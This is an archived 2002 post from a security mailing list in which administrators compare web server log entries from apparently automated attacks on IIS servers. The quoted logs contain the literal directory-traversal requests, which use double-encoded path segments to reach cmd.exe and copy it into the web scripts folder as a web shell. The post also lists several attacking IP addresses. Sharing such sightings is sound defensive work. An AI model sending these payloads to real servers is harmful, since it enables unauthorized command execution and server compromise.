[Dshield] Re: New IIS directory traversal worm, or just a tool sig?

Tim Rushing dshield at threenorth.com
Wed Nov 6 19:06:26 GMT 2002


All of mine are of the format that Mr. Simpson indicates.

24.174.135.49 - - [29/Oct/2002:15:06:19 -0600]
142.163.201.241 - - [02/Nov/2002:05:51:27 -0600]
216.202.108.210 - - [02/Nov/2002:05:57:46 -0600]
216.78.58.230 - - [03/Nov/2002:03:45:29 -0600]
65.68.208.57 - - [03/Nov/2002:04:00:38 -0600]
66.28.241.10 - - [03/Nov/2002:12:59:06 -0600]
148.223.133.195 - - [04/Nov/2002:18:47:30 -0600]



At 09:16 AM 11/5/02 -0600, Preston G. Simpson wrote:
>James C Slora wrote:
>
> > http://ww.tk.gov/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
> > copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\scripts.exe
> >
> > Anyone else seen this?
>
>         I've seen something similar:
>
>206.203.46.237 - GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/
>c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
>
>         I got the first one of these (all from different addresses)
>on or about 30 October. I've seen 13 to date, outnumbering the more
>usual garden variety directory traversals I've seen.
>
>_______________________________________________
>Dshield mailing list
>Dshield at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list